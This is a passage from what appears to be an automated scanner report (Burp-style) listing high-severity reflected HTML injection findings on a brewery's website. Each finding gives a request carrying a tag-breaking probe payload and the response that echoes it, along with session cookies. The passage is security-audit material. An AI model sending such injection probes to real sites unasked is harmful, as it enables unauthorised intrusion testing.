Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookaf568"><a>e655369a8f7_page" class="facebookaf568">
...[SNIP]...

1.164. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcab8"><a>b4e49b085cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbcab8"><a>b4e49b085cc/content/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbcab8"><a>b4e49b085cc_page" class="facebookbcab8">
...[SNIP]...

1.165. http://www.ninkasibrewing.com/facebook/content/js/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><a>92edcf6844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf5e7b"><a>92edcf6844e/content/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf5e7b"><a>92edcf6844e_page" class="facebookf5e7b">
...[SNIP]...

1.166. http://www.ninkasibrewing.com/facebook/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd76"><a>cf3d86cfba9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookccd76"><a>cf3d86cfba9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookccd76"><a>cf3d86cfba9_page" class="facebookccd76">
...[SNIP]...

1.167. http://www.ninkasibrewing.com/facebook/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c86"><a>90405adf417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4c86"><a>90405adf417/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke4c86"><a>90405adf417_page" class="facebooke4c86">
...[SNIP]...

1.168. http://www.ninkasibrewing.com/facebook/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd20"><a>8eded1a6aaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7bd20"><a>8eded1a6aaa/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7bd20"><a>8eded1a6aaa_page" class="facebook7bd20">
...[SNIP]...

1.169. http://www.ninkasibrewing.com/facebook/content/js/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f08d3"><a>32a16c21b89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf08d3"><a>32a16c21b89/content/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf08d3"><a>32a16c21b89_page" class="facebookf08d3">
...[SNIP]...

1.170. http://www.ninkasibrewing.com/facebook/content/js/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694a2"><a>600e3070e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook694a2"><a>600e3070e71/content/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook694a2"><a>600e3070e71_page" class="facebook694a2">
...[SNIP]...

1.171. http://www.ninkasibrewing.com/facebook/content/js/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d13"><a>4dcbedf8a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka9d13"><a>4dcbedf8a30/content/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka9d13"><a>4dcbedf8a30_page" class="facebooka9d13">
...[SNIP]...

1.172. http://www.ninkasibrewing.com/facebook/content/js/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ea"><a>bca6b40fe7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2d5ea"><a>bca6b40fe7b/content/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook2d5ea"><a>bca6b40fe7b_page" class="facebook2d5ea">
...[SNIP]...

1.173. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90ee5"><a>3e6417b9771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook90ee5"><a>3e6417b9771/content/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook90ee5"><a>3e6417b9771_page" class="facebook90ee5">
...[SNIP]...

1.174. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4808"><a>15a45105ef8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4808"><a>15a45105ef8/content/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke4808"><a>15a45105ef8_page" class="facebooke4808">
...[SNIP]...

1.175. http://www.ninkasibrewing.com/help/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d171a"><a>6ee7d9ed931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /helpd171a"><a>6ee7d9ed931/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="helpd171a"><a>6ee7d9ed931_page" class="helpd171a">
...[SNIP]...

1.176. http://www.ninkasibrewing.com/help/beer_finder/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88caf"><a>00b68d8c362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help88caf"><a>00b68d8c362/beer_finder/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help88caf"><a>00b68d8c362_page" class="help88caf">
...[SNIP]...

1.177. http://www.ninkasibrewing.com/help/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8623a"><a>0cfef24a7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help8623a"><a>0cfef24a7a5/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help8623a"><a>0cfef24a7a5_page" class="help8623a">
...[SNIP]...

1.178. http://www.ninkasibrewing.com/help/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6325e"><a>44db42daa5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6325e"><a>44db42daa5a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help6325e"><a>44db42daa5a_page" class="help6325e">
...[SNIP]...

1.179. http://www.ninkasibrewing.com/help/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ae0"><a>a81cb64163d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help41ae0"><a>a81cb64163d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help41ae0"><a>a81cb64163d_page" class="help41ae0">
...[SNIP]...

1.180. http://www.ninkasibrewing.com/help/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6937c"><a>7458fba0b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6937c"><a>7458fba0b6b/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help6937c"><a>7458fba0b6b_page" class="help6937c">
...[SNIP]...

1.181. http://www.ninkasibrewing.com/help/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e46"><a>dc8a43dd223 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help55e46"><a>dc8a43dd223/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:33 GMT
Server: Apache
